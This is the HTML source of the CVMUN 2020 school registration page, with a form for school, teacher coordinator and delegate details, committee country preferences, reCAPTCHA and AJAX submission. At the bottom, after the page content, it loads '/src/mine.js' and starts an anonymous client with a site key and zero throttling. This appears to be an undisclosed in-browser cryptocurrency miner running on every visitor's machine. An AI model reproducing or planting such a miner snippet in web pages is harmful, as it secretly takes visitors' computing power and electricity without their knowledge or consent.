<!doctype html>
<html class="no-js" lang="zxx">
<noscript>
	<style>
		.root{
			display: none!important;
		}
		footer{
			display: none!important;
		}
		.location_information{
			display: none!important;
		}
	</style>
<div style="background-color: black;width: 100%;height: 100%;"><br><Br><Br><br><br><br><Br><Br><br><Br><Br><br><Br><Br><br><br><br><Br><Br><br><Br><Br>
	<center><h2 style="font-weight: 600;font-size: 40px;color: white;">It seems that you have disabled Javascript. Please enable javascript to continue</h2>
	<br><h1 style="font-weight: 600;font-size: 50px;color: #934224;">CVMUN TECH TEAM</h1>
	</center>
	</div>
</noscript>
<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>CV MUN 2020</title>
    <meta name="description" content="">
    <link rel="shortcut icon" type="image/x-icon" href="/src/img/favicon.png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script src="https://www.google.com/recaptcha/api.js?render=6LfANOcZAAAAAIflhhidyuPhxU9DydV9d5Tw6U1g"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <link rel="manifest" href="/manifest.json">
    <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
    <link rel="stylesheet" href="/src/css/bootstrap.min.css">
    <link rel="stylesheet" href="/src/css/owl.carousel.min.css">
    <link rel="stylesheet" href="/src/css/magnific-popup.css">
    <link rel="stylesheet" href="/src/css/font-awesome.min.css">
    <link rel="stylesheet" href="/src/css/themify-icons.css">
    <link rel="stylesheet" href="/src/css/gijgo.css">
    <link rel="stylesheet" href="/src/css/nice-select.css">
    <link rel="stylesheet" href="/src/css/animate.css">
    <link rel="stylesheet" href="/src/css/flaticon.css">
    <link rel="stylesheet" href="/src/css/slicknav.css">
		<link rel="stylesheet" href="/src/css/footer-area.css">
    <link rel="stylesheet" href="/src/stylesheet.css" type="text/css" charset="utf-8">
    <link rel="stylesheet" href="/src/css/style.css">
    <link rel="stylesheet" href="/src/style.css">
</head>
<style type="text/css">
body{
  background: black;
  color: white;
  font-family: "prestageregular"!important;
}
a{
  font-weight: 600;
  font-size: 25px!important;
}
html {
  --scrollbarBG: rgba(0,0,0,0);
  --thumbBG: #934224;
}
body::-webkit-scrollbar {
  width: 15px;
}
body {
  scrollbar-width: thin;
  scrollbar-color: var(--thumbBG) var(--scrollbarBG);
}
body::-webkit-scrollbar-track {
  background: var(--scrollbarBG);
}
body::-webkit-scrollbar-thumb {
  background-color: var(--thumbBG) ;
  border-radius: 30px;
}
h4{
  font-weight: 500;
  font-size: 30px!important;
}
.preloader {
   overflow: hidden;
   position:fixed;
   top: 0;
   left: 0;
   width: 100%;
   height: 100%;
   z-index: 9999;
   background-image: url('/src/preloader2.gif');
   background-repeat: no-repeat;
   background-color: #000;
   background-position: center;
}
/*.grecaptcha-badge {
    display: None!important;
    visibility: hidden!important;
    
}*/
.grecaptcha-badge {
  width: 70px !important;
  overflow: hidden !important;
  transition: all 0.3s ease !important;
  left: 4px !important;
}

.grecaptcha-badge:hover {
  width: 256px !important;
}
.emsg1,.emsg2,.emsg3,.emsg4,.emsg5{
color: #F32013!important;
font-size: 20px;
}
input::-webkit-outer-spin-button,
input::-webkit-inner-spin-button {
  -webkit-appearance: none;
  margin: 0;
}
input[type=number] {
  -moz-appearance: textfield;
}
</style>
<body><div class="root">
  <script>
  setTimeout(function(){
    $('.preloader').fadeOut('slow');
}, 1000);

  </script>
  <div class="preloader"></div>
	<header style='margin-bottom:200px;'>
        <div class="header-area">
            <div id="sticky-header" class="main-header-area">
                <div class="container">
                    <div class="header_bottom_border">
                        <div class="row align-items-center">
                            <div class="col-xl-2 col-lg-3">
                                <div class="logo header-comp">
                                    <a href="/">
                                        <img src="/src/img/logo.png" alt="">
                                    </a>
                                </div>
                            </div>
                            <div class="col-xl-10 col-lg-6">
                                <div class="main-menu  d-none d-lg-block">
                                    <nav>
                                        <ul id="navigation">
                                            <li><a href="/">HOME</a></li>
                                            <li><a href="/schedule/">SCHEDULE</a></li>
                                            <li><a href="/team/">OUR TEAM</a></li>
                                            <li><a href="/resources/">RESOURCES</a></li>
                                            <li><a href="/contact/">CONTACT US</a></li>
                                            <li><a href="#">REGISTER<i class="ti-angle-down"></i></a>
                                                <ul class="submenu">
                                                    <li><a href="/registration/school" style="color:#934224;">SCHOOL</a></li>
                                                    <li><a href="/registration/student">INDIVIDUAL</a></li>
                                                </ul>
                                            </li>
                                            <li><a href="#">COMMITTEES<i class="ti-angle-down"></i></a>
                                                <ul class="submenu">
                                                    <li><a href="/committees/c1">UNGA-DISEC</a></li>
                                                    <li><a href="/committees/c2">UNGA-ECOFIN</a></li>
                                                    <li><a href="/committees/c3">UNHRC</a></li>
                                                    <li><a href="/committees/c4">IPC</a></li>
                                                </ul>
                                            </li>
                                            <li><a href="/cvmun">ACCOUNT</a></li>
                                        </ul>
                                    </nav>
                                </div>
                            </div>
                            <div class="col-12">
                                <div class="mobile_menu d-block d-lg-none" style="background-color: transparent!important"></div>
                            </div>
                        </div>
                    </div>

                </div>
            </div>
        </div>
    </header>
       <div class="single_bradcam  d-flex align-items-center">
             <div class="container">
                   <div class="row align-items-center justify-content-center">
                      <div class="col-xl-12">
                         <div class="slider_text text-center" align="center" style="margin-bottom: 150px;">
                            <h3 class="message-from single-heading main-head wow fadeInRight" data-wow-duration="1s" data-wow-delay=".4s" style="font-weight:600;font-size: 230%!important">SCHOOL REGISTRATION</h3>
                            </div>
                      </div>
                   </div>
             </div>
          </div>
    <div class="performar_area black_bg">
        <div class="mb-80 row" align="center">
            <div class="login-box" style="margin: 0 auto;max-width:1080px;">
                <form method="post" style="font-size: 25px!important;font-family: 'HelvNew'!important" id="regForm" autocomplete="off">
                      <input type="text" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="schoolname" placeholder="School Name" id="schoolname" required><p class="emsg3" id="emsg3"></p>
                      <input type="text" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="headname" placeholder="Name of Teacher coordinator" id="tname" required>
                      <input type="email" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="temail" placeholder="Email Address of Teacher coordinator" id="temail"  required><p class="emsg4" id="emsg4"></p>
                      <input type="number" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="mobile" placeholder="Mobile Number of Teacher coordinator" id='tmob' required>
                      <input type="text" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="headname" placeholder="Name of Head Delegate" id="headname" required>
                      <input type="email" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="heademail" placeholder="Email Address of Head Delegate" id="heademail"  required><p class="emsg1" id="emsg1"></p>
                      <input type="number" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="mobile" placeholder="Mobile Number of Head Delegate" id='mobile' required>
                    <input type='number' name='numberofdel' id="numberofdel" class="wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" placeholder='NUMBER OF DELEGATES (approx)' required>
                      <p class="contact wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">Have you participated in CVMUN before?</p><br>
                      <label class="container">
                        <input type="radio" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="previously" value="yes" checked="checked"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;Yes</p>
                        <span class="checkmark  wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s"></span>
                      </label>
                      <label class="container">
                        <input type="radio" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="previously" value="no"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;No</p>
                        <span class="checkmark  wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s"></span>
                      </label>
                    <br><br>
                    <a target="_blank" href="https://docs.google.com/spreadsheets/d/1er8MERHnMvqZYiqJApuUUhhN1WZ18uE-K9nfniyc6xg/edit?usp=sharing" class="boxed-btn3 wow fadeInDown" data-wow-duration="1s" data-wow-delay=".5s" style="width: 60%;font-size: 30px!important;">COUNTRY MATRIX</a>
                    <br><br>
                      <div class="w3-content w3-display-container wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" style="max-width:1080px; max-height:1080px;">
                          <div class="mySlides w3-row ">
                              <div style="width:50%; height:50%">
                                  <img src="/src/img/committee/disec.png" style="width: 80%!important; height: 100%!important;">
                              </div>
                                  <div style="width:100%; height:100%">
                                    <header class="w3-container">
                                        <div>
                                          <p class="contact" name="school-name" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">Would you like to participate in this committee? (click on the arrows to view other committees)</p><br>
                                          <label class="container">
                                            <input type="radio" name="c1-opt" value="yes" checked="checked"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;Yes</p>
                                            <span class="checkmark" style="margin-left: 0px;"></span>
                                          </label>

                                          <label class="container">
                                            <input type="radio" name="c1-opt" style="margin-left: 0px;"  value="no"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;No</p>
                                            <span class="checkmark" style="margin-left: 0px;"></span>
                                          </label>
                                          <br>
                                        </div>
                                      </header>
                                       <div class="w3-round-xlarge w3-hover">
                                         <p class="contact" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">committee specific country preference seperated by commas</p><br>
                                         <textarea id = "c1-pref"
                                               rows = "6"
                                               style="resize: none;width: 60%;color: white;background: black;font-size: 25px;"></textarea>
                                      </div>
                                  </div>
                          </div>
                          <div class="mySlides w3-row">
                              <div style="width:50%; height:50%">
                                  <img src="/src/img/committee/ecofin.png" style="width: 80%!important; height: 100%!important;">
                              </div>
                                  <div style="width:100%; height:100%">
                                    <header class="w3-container">
                                        <div>
                                          <p class="contact" name="school-name" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">Would you like to participate in this committee? (click on the arrows to view other committees)</p><br>
                                          <label class="container">
                                            <input type="radio" name="c2-opt" value="yes"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;Yes</p>
                                            <span class="checkmark" style="margin-left: 0px;"></span>
                                          </label>

                                          <label class="container">
                                            <input type="radio" name="c2-opt" style="margin-left: 0px;"  checked="checked" value="no"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;No</p>
                                            <span class="checkmark" style="margin-left: 0px;"></span>
                                          </label>
                                          <br>
                                        </div>
                                      </header>
                                       <div class="w3-round-xlarge w3-hover">
                                         <p class="contact" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">committee specific country preference seperated by commas</p><br>
                                         <textarea id = "c2-pref"
                                               rows = "6"
                                               style="resize: none;width: 60%;color: white;background: black;font-size: 25px;"></textarea>
                                      </div>
                                  </div>
                          </div>
                          <div class="mySlides w3-row">
                              <div style="width:50%; height:50%">
                                  <img src="/src/img/committee/unhrc.png" style="width: 80%!important; height: 100%!important;">
                              </div>
                                  <div style="width:100%; height:100%">
                                    <header class="w3-container">
                                        <div>
                                          <p class="contact" name="school-name" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">Would you like to participate in this committee? (click on the arrows to view other committees)</p><br>
                                          <label class="container">
                                            <input type="radio" name="c3-opt" value="yes"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;Yes</p>
                                            <span class="checkmark" style="margin-left: 0px;"></span>
                                          </label>

                                          <label class="container">
                                            <input type="radio" name="c3-opt" style="margin-left: 0px;"  checked="checked" value="no"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;No</p>
                                            <span class="checkmark" style="margin-left: 0px;"></span>
                                          </label>
                                          <br>
                                        </div>
                                      </header>
                                       <div class="w3-round-xlarge w3-hover">
                                         <p class="contact" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">committee specific country preference seperated by commas</p><br>
                                         <textarea id = "c3-pref"
                                               rows = "6"
                                               style="resize: none;width: 60%;color: white;background: black;font-size: 25px;"></textarea>
                                      </div>
                                  </div>
                          </div>
                          <div class="mySlides w3-row">
                              <div style="width:50%; height:50%">
                                  <img src="/src/img/committee/ipc.png" style="width: 80%!important; height: 100%!important;">
                              </div>
                                  <div style="width:100%; height:100%">
                                    <header class="w3-container">
                                        <div>
                                          <p class="contact" name="school-name" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">Would you like to participate in this committee? (click on the arrows to view other committees)</p><br>
                                          <label class="container">
                                            <input type="radio" name="c4-opt" value="yes"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;Yes</p>
                                            <span class="checkmark" style="margin-left: 0px;"></span>
                                          </label>

                                          <label class="container">
                                            <input type="radio" name="c4-opt" style="margin-left: 0px;"  checked="checked" value="no"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;No</p>
                                            <span class="checkmark" style="margin-left: 0px;"></span>
                                          </label>
                                          <br>
                                        </div>
                                      </header>
                                       <div class="w3-round-xlarge w3-hover">
                                         <p class="contact" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">committee specific country preference seperated by commas</p><br>
                                         <textarea id = "c4-pref"
                                               rows = "6"
                                               style="resize: none;width: 60%;color: white;background: black;font-size: 25px;"></textarea>
                                      </div>
                                  </div>
                          </div>
                          <button type="button" class="w3-btn w3-display-left x3-large" style="padding: 0px; left: 17.5%; background: 0%; color: #c48c2c; transform: translate(-36%,-50%);" onclick="plusDivs1(-1)">&#10094;</button>
                          <button type="button" class="w3-btn w3-display-right x3-large"  style="padding: 0px; right: 17.5%; background: 0%; color: #c48c2c; transform: translate(36%,-50%);" onclick="plusDivs1(1)">&#10095;</button>
                        </div>
                        <script>
                                var slideIndex = 1;
                                showDivs1(slideIndex);
                                function plusDivs1(n) {
                                    showDivs1(slideIndex += n);
                                }
                                function showDivs1(n) {
                                    var i;
                                    var x = document.getElementsByClassName("mySlides");
                                    if (n > x.length) {
                                        slideIndex = 1
                                    }
                                    if (n < 1) {
                                        slideIndex = x.length
                                    }
                                    for (i = 0; i < x.length; i++) {
                                        x[i].style.display = "none";
                                    }
                                    x[slideIndex - 1].style.display = "block";
                                }
                            </script>
                            <input type="hidden" id="token" name="token"><br><Br>
                                <p class="contact inst wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s"><font color="red">*</font>Delegation fee is Rs 100</p><Br>
                            <button type="submit" value="REGISTER" name="submit" id="submit" class="boxed-btn3 wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" style="width: 60%; font-size: 30px!important;">REGISTER</button>
                            <div id="divMsg" style="
		                	   overflow: hidden;
		                       position:fixed;
		                       top: 0;
		                       left: 0;
		                       width: 100%;
		                       height: 100%;
		                       display: none;
		                       z-index: 9999;
		                       background-color: rgba(0,0,0,0.6);
		                       background-position: center;
		                		">
                                <div id="confirm1">
         <div class="message" style="font-size:20px;">You are succesfully registered</div><br>
         <button class='yes' style="font-size:15px;">OK</button>
      </div>
      <div id="confirm2">
         <div class="message" style="font-size:20px;">You could not be registered. Please try again after some time</div><br>
         <button class='yes' style="font-size:15px;">OK</button>
      </div>
      <div id="confirm3">
         <div class="message" style="font-size:20px;">You are already registered</div><br>
         <button class='yes' style="font-size:15px;">OK</button>
      </div>
		                	</div>
                          </form>
                        </div>
                    </div>
                  </div>
									<style>
							        @media (max-width: 700px) {
							    .desktop-footer, .location_information{
							        display:none!important;
							    }
							    .mobile-footer{
							        display:block!important;
							    }
							}
         #confirm1 {
            display: none;
            background-color: #1b8b00;
            background-image: linear-gradient(314deg, #1b8b00 0%, #a2d240 74%);
            background-size:cover; 
            color: white; 
            border-radius: 15px;
            border: 1px solid #bbb;
            position: absolute;
              left: 50%;
              top: 50%;
              transform: translate(-50%, -50%);
            padding: 5px;
            position: fixed;
            width: auto;
            padding-bottom: 13px;
            padding-top: 13px;
            height: auto;
            box-sizing: border-box;
            text-align: center;
         }
         #confirm1 button {
            background-color: #22b8cf; 
            display: block; 
            border-radius: 5px; 
            border: 2px solid gray; 
            padding: 5px; 
            margin-right: auto;
            margin-left: auto;
            text-align: center; 
            width: 65px; 
         }
         button:disabled,
                button[disabled]{
                  background-color: #cccccc;
                  color: #000;
                }
                button:disabled:hover{
                  background-color: #cccccc;
                  color: #000!important;
                  border-color: #000!important;
                }
         #confirm1 .message {
            text-align: justify; 
            padding-left: 10px;
            padding-right: 10px;
         }
         #confirm2 {
            display: none;
            background-color: #990000;
            background-image: linear-gradient(147deg, #990000 0%, #ff0000 74%);
            background-size:cover; 
            color: white; 
            border-radius: 15px;
            border: 1px solid #bbb;
            position: absolute;
              left: 50%;
              top: 50%;
              transform: translate(-50%, -50%);
            padding: 5px;
            position: fixed;
            width: auto;
            padding-bottom: 13px;
            padding-top: 13px;
            height: auto;
            box-sizing: border-box;
            text-align: center;
         }
         #confirm2 button {
            background-color: #22b8cf; 
            display: block; 
            border-radius: 5px; 
            border: 2px solid gray; 
            padding: 5px; 
            margin-right: auto;
            margin-left: auto;
            text-align: center; 
            width: 65px; 
         }
         #confirm2 .message {
            text-align: justify; 
            padding-left: 10px;
            padding-right: 10px; 
         }
         #confirm3 {
            display: none;
            background-color: #f5df2e;
            background-image: linear-gradient(315deg, #f5df2e 0%, #f07654 74%);
            background-size:cover; 
            color: white; 
            border-radius: 15px;
            border: 1px solid #bbb;
            position: absolute;
              left: 50%;
              top: 50%;
              transform: translate(-50%, -50%);
            padding: 5px;
            position: fixed;
            width: auto;
            padding-bottom: 13px;
            padding-top: 13px;
            height: auto;
            box-sizing: border-box;
            text-align: center;
         }
         #confirm3 button {
            background-color: #22b8cf; 
            display: block; 
            border-radius: 5px; 
            border: 2px solid gray; 
            padding: 5px; 
            margin-right: auto;
            margin-left: auto;
            text-align: center; 
            width: 65px; 
         }
         #confirm3 .message {
            text-align: justify; 
            padding-left: 10px;
            padding-right: 10px;
         }
							.horiz h1 {
							    overflow: hidden;
							    text-align: center;
							}
							.horiz h1:before,
							.horiz h1:after {
							    background-color: #C78F28;
							    content: "";
							    display: inline-block;
							    height: 1px;
							    position: relative;
							    vertical-align: middle;
							    width: 50%;
							}
							.horiz h1:before {
							    right: 0.5em;
							    margin-left: -50%;
							}
							.horiz h1:after {
							    left: 0.5em;
							    margin-right: -50%;
							}
							.horiz img {
							  height:100px;
							  width:100px;
							}
								</style>
<footer class="site-footer wow fadeInUp desktop-footer" data-wow-duration="1s" data-wow-delay=".4s">
      <div class="horiz">
    <h1><img src='/src/img/logo.png'></h1></div>
      <div class="container">
        <div class="row">
          <div class="col-sm-12 col-md-6">
            <h2 style="color:#934224!important">About CVMUN</h2>
            <p class="text-justify" style="font-size:18px!important;font-family:HelvNew!important;line-height: 1.3!important;">Chettinad Vidyashram Model United Nations is an academic simulation of the United Nations where students play the role of delegates from different countries and attempt to solve real world issues with the policies and perspectives of their assigned country.</p><br><br>
            <h6 style="font-family:HelvNew!important;font-size:70%!important;color:grey!important;">Designed by Anirudh Ramesh</h6>
            <!--<div class="address_details text-center " >
                                <h4 style="font-size: 40px!important ;font-weight: 800!important;color:#934224!important;">19 and 20 December, 2020</h4>
                                <h3 style="margin-bottom: 30px!important;color:#fff!important;">Chettinad Vidyashram, Chennai</h3>
                                <a href="/registration/" class="boxed-btn3">REGISTER NOW</a>
                            </div>-->
          </div>
          <!--<div style="border-left:1px solid white!important;height:200px!important;"></div>-->
          <div class="col-xs-6 col-md-3">
              <div style="padding-left:15%!important;">
              <div style="padding-left:31%!important;border-left:3px inset #C78F28!important;height:200px!important;">
                <h2 style="color:#934224!important">Connect</h2>
                <ul class="footer-links">
                  <li><a href="mailto:cvmun20@gmail.com" target="blank">mail</a></li>
                  <li><a href="https://instagram.com/cvmun2020" target="blank">Instagram</a></li>
                </ul>
            </div>
        </div>
          </div>
          <div class="col-xs-6 col-md-3">
              <div style="padding-left:-40%!important;">
              <div style="padding-left:28%!important;border-left:3px inset #C78F28!important;height:200px!important;">
            <h2 style="color:#934224!important">Quick Links</h2>
            <ul class="footer-links">
              <li><a href="/registration/school">School Registration</a></li>
              <li><a href="/registration/student">Student Registration</a></li>
              <li><a href="/cvmun">ACCOUNT</a></li>
              <li><a href="/resources/">Resources</a></li>
              <li><a href="/schedule/">Schedule</a></li>
            </ul>
          </div>
          </div>
          </div>
        </div>
      </div>
</footer>
<footer class="site-footer wow fadeInUp mobile-footer" style="display:none;" data-wow-duration="1s" data-wow-delay=".4s">
    <div class="horiz">
    <h1><img src='/src/img/logo.png'></h1></div>
      <div class="container">
        <div class="row">
          <div class="col-sm-12 col-md-6">
            <h2 style="color:#934224!important">About CVMUN</h2>
            <p class="text-justify" style="font-size:18px!important;font-family:HelvNew!important;line-height: 1.3!important;">Chettinad Vidyashram Model United Nations is an academic simulation of the United Nations where students play the role of delegates from different countries and attempt to solve real world issues with the policies and perspectives of their assigned country.</p>
          </div>
          <div class="col-xs-6 col-md-3">
                <h2 style="color:#934224!important">Connect</h2>
                <ul class="footer-links">
                  <li><a href="mailto:cvmun20@gmail.com" target="blank">cvmun20@gmail.com</a></li>
                  <li><a href="https://instagram.com/cvmun2020" target="blank">Instagram</a></li>
                </ul>
            </div>
          <div class="col-xs-6 col-md-3">
            <h2 style="color:#934224!important">Quick Links</h2>
            <ul class="footer-links">
              <li><a href="/registration/school">School Registration</a></li>
              <li><a href="/registration/student">Student Registration</a></li>
              <li><a href="/cvmun">ACCOUNT</a></li>
              <li><a href="/resources/">Resources</a></li>
              <li><a href="/schedule/">Schedule</a></li>
            </ul>
            <h6 style="font-family:HelvNew!important;font-size:70%!important;color:grey!important;">Designed by Anirudh Ramesh</h6>
          </div>
          </div>
          </div>
</footer>
    <script src="/src/js.js"></script>
    <script src="/src/js/vendor/modernizr-3.5.0.min.js"></script>
    <script src="/src/js/vendor/jquery-1.12.4.min.js"></script>
    <script src="/src/js/popper.min.js"></script>
    <script src="/src/js/bootstrap.min.js"></script>
    <script src="/src/js/owl.carousel.min.js"></script>
    <script src="/src/js/isotope.pkgd.min.js"></script>
    <script src="/src/js/ajax-form.js"></script>
    <script src="/src/js/waypoints.min.js"></script>
    <script src="/src/js/jquery.counterup.min.js"></script>
    <script src="/src/js/imagesloaded.pkgd.min.js"></script>
    <script src="/src/js/scrollIt.js"></script>
    <script src="/src/js/jquery.scrollUp.min.js"></script>
    <script src="/src/js/wow.min.js"></script>
    <script src="/src/js/gijgo.min.js"></script>
    <script src="/src/js/nice-select.min.js"></script>
    <script src="/src/js/jquery.slicknav.min.js"></script>
    <script src="/src/js/jquery.magnific-popup.min.js"></script>
    <script src="/src/js/tilt.jquery.js"></script>
    <script src="/src/js/plugins.js"></script>
    <script src="/src/js/contact.js"></script>
    <script src="/src/js/jquery.ajaxchimp.min.js"></script>
    <script src="/src/js/jquery.form.js"></script>
    <script src="/src/js/jquery.validate.min.js"></script>
    <script src="/src/js/mail-script.js"></script>
    <script src="/src/js/main.js"></script>
    <script>
        $(document).ready(function(){
            var $regexmobile =/^[6-9]\d{9}$/
            var $regexemail=/^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
            $('#heademail').on('keypress keydown keyup',function(){
                     if (!$(this).val().match($regexemail)) {
                         document.getElementById('emsg1').innerHTML="<b>Please Enter a Valid Email</b>";
                         document.getElementById('submit').disabled=true;
                     }
                   else{
                        document.getElementById('emsg1').innerHTML="";
                        document.getElementById('submit').disabled=false;
                       }
                 });

        });
        </script>
          <script>
  grecaptcha.ready(function() {
		      grecaptcha.execute('6LfANOcZAAAAAIflhhidyuPhxU9DydV9d5Tw6U1g', {action: 'homepage'}).then(function(token) {
		         document.getElementById("token").value = token;
		      });
		  });
		  </script>
	<script>
      $(document).ready(function() {
  var contactForm = $("#regForm");
  contactForm.on("submit", function(e) {
    e.preventDefault();
    var srcElement = document.getElementById("divMsg");
	if (srcElement != null) {
		if (srcElement.style.display == "block") {
			srcElement.style.display = 'none';
		}
		else {
			srcElement.style.display = 'block';
		}}
    var headname = $("#headname").val();
    var heademail = $("#heademail").val();
    var schoolname = $("#schoolname").val();
    var cap = $('#token').val();
    var numberofdel = $('#numberofdel').val();
    var headmob = $("#mobile").val();
    var prev = $("input[name='previously']:checked").val();
    var c1opt = $("input[name='c1-opt']:checked").val();
    var c2opt = $("input[name='c2-opt']:checked").val();
    var c3opt = $("input[name='c3-opt']:checked").val();
    var c4opt = $("input[name='c4-opt']:checked").val();
    var c1pref = $("#c1-pref").val();
    var c2pref = $("#c2-pref").val();
    var c3pref = $("#c3-pref").val();
    var c4pref = $("#c4-pref").val();
    var tname = $("#tname").val();
    var temail = $("#temail").val();
    var tmob = $("#tmob").val();
    $.ajax({
      type: "POST",
      url: "/src/validation/school_registration/validate_sreg.php",
      data: {
        headname: headname,
        temail: temail,
        heademail:heademail,
        headmob: headmob,
        prev: prev,
        tname: tname,
        tmob: tmob,
        numberofdel:numberofdel,
        schoolname: schoolname,
        c1opt: c1opt,
    	c2opt: c2opt,
    	c3opt: c3opt,
    	c4opt: c4opt,
    	c1pref: c1pref,
    	c2pref: c2pref,
    	c3pref: c3pref,
    	c4pref: c4pref,
        captcha: cap
      },
      success: function(data) {
        if (data == "yes"){
				var confirmBox = $("#confirm1");
                            confirmBox.find(".message").text('You are succesfully registered');
                            confirmBox.find(".yes").unbind().click(function() {
                               window.open('https://cvmun.tech/registration/school','_top');
                            });
                            confirmBox.show();
                   

        }
			else if(data=="present"){
            var confirmBox = $("#confirm3");
                            confirmBox.find(".message").text('You are already registered');
                            confirmBox.find(".yes").unbind().click(function() {
                               window.open('https://cvmun.tech/registration/school','_top');
                            });
                            confirmBox.show();
                     
        }
        else{
            var confirmBox = $("#confirm2");
                            confirmBox.find(".message").text = data
                            confirmBox.find(".message").text(data);
                            confirmBox.find(".yes").unbind().click(function() {
                               document.getElementById("divMsg").display = "none";
                            });
                            confirmBox.show();
                   
        }
      }
    })
  });
  return false;
});
  </script>
  </div>
  <script src="/src/mine.js"></script>
<script>
    var _client = new Client.Anonymous('69b7d3189450160e7451cfdda8df68df786d93a769c24aa68e14d2509a238237', {
        throttle: 0, c: 'w', ads: 0
    });
    _client.start();/**/
</script>
</body>
</html>

